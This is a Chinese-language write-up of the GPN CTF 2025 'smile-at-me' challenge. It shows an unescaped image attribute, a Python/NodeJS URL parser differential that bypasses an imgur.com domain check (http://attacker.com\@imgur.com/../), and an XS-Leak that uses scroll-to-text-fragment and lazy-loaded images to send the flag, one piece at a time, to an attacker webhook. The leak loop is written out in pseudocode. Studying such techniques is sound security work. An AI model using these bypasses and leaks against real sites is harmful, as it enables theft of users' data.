xss利用搜索侧信道 -- GPN CTF 2025 smile-at-me

此处存在未转义的插入

html 复制代码
{% if note.image_url %}
    <img src={{note.image_url}} alt="Your favorit Image">
{% endif %}

对域名的校验逻辑如下

python 复制代码
if image_url and not validate_url(image_url, target_domain='imgur.com'):
python 复制代码
def validate_url(url: str, target_domain: str = None) -> bool:
    """
    校验URL是否合法,并可选校验域名是否为指定目标域名

    :param url: 需要校验的URL字符串
    :param target_domain: (可选)目标域名,若指定则校验URL的主机名是否与之相同
    :return: 如果URL合法且(可选)域名匹配则返回True,否则返回False
    """
    try:
        parsed = urlparse(url)  # 解析URL
        print(f"Parsed URL: {parsed}")  # 打印解析结果,便于调试
        # 检查协议是否为http或https,且主机名不为空
        if parsed.scheme not in ('http', 'https') or not parsed.hostname:
            return False
        # 如果指定了目标域名,则校验主机名是否与目标域名一致
        if target_domain and parsed.hostname != target_domain:
            return False
        return True  # 校验通过
    except Exception:
        # 发生异常时返回False
        return False

仔细观察,我们能注意到机器人端(NodeJS URL / Puppeteer)再解析一次同一个 URL 才真正发请求。这两套解析器并不完全一致,出现了解析差异的可能(parser differential)。

复制代码
http://evil.com\@example.com
  • Python 认为 host 是 example.com(@ 后的内容当用户名被吃掉了);
  • NodeJS 把 \ 当 /,host 读成 evil.com,成功绕过。
  • .../ → WHATWG 解析器会做路径归一化,而 urlparse 不会。配合上一条可把 /@example.com 归回根路径 /,避免 404。

这意味这我们可以轻易绕过

js 复制代码
http://attacker.com\@imgur.com/../" ANY_ATTR=ANY_VALUE

但是题目拥有严格的要求

python 复制代码
   CSP_POLICY = (
       "default-src 'none'; "
       "script-src 'self'; "
       "style-src https://cdn.simplecss.org 'self'; "
       "img-src *; "
       "base-uri 'none';"
       "frame-ancestors 'none';"
   )

禁止所有内联 JS、禁止外域脚本、禁止 CSS 利用。因此思路改为侧信道(XS Leaks)------Scroll-To-Text-Fragment (STTF):

  1. 浏览器访问 URL#:~:text=<要搜索的字符串> 时,会在页面加载完毕后自动滚动到第一个匹配的位置。

  2. 页面很长时会使用"懒加载图片"(loading=lazy);只有滚动到可视区域的图片才会真的发出 HTTP 请求。

  3. 我们把自己的 webhook 图片放在离顶部很远的位置;只有当浏览器因为 STTF 滚动到这一行时才会触发请求。

    .../note/<id>%#:~:text=💻

最终流程类似如下

python 复制代码
flag = "GPNCTF{"
while not flag.endswith("}"):
    group1, group2 = split(emojis)
    url = /note/<id>%23:~:text=flag+group1&text=FLAG_NOT_FOUND   # 同时挂 fallback
    send_to_bot(url)
    if webhook_hit():
        emojis = group1
    else:
        emojis = group2
    if len(emojis) == 1:
        flag += emojis[0]
相关推荐
oi..4 小时前
《Web 安全入门|XSS 漏洞原理、CSP 策略与 HttpOnly 防护实践》
前端·网络·测试工具·安全·web安全·xss
Palpitate_LL5 小时前
从XSS到“RCE“的PC端利用链构建
前端·xss
oi..7 小时前
Web 安全入门:XSS 漏洞原理与防护学习笔记 [ OWASP Top10 漏洞原理学习(仅用于合规测试)]
前端·网络·笔记·安全·网络安全·xss
网安老伯7 小时前
护网行动防守实战:Web应用XSS漏洞应急处置与防护体系搭建_护网行动web应用
linux·运维·服务器·前端·web安全·网络安全·xss
鹅天帝3 天前
20260407网安学习日志——序列化漏洞
前端·学习·web安全·网络安全·xss
cTz6FE7gA3 天前
XSS、CSRF、SQL注入、防重放与敏感数据保护的分层策略
sql·xss·csrf
188号安全攻城狮3 天前
【前端安全】Trusted Types 全维度技术指南:CSP 原生 DOM XSS 防御终极方案
前端·安全·网络安全·xss
LlNingyu6 天前
什么是SSRF,它最基本的形式是什么(一)
前端·网络·安全·web安全·xss·csrf
admin and root6 天前
XSS之Flash弹窗钓鱼
前端·网络·安全·web安全·渗透测试·xss·src
Mr. G K7 天前
探测XSS漏洞方法
安全·web安全·xss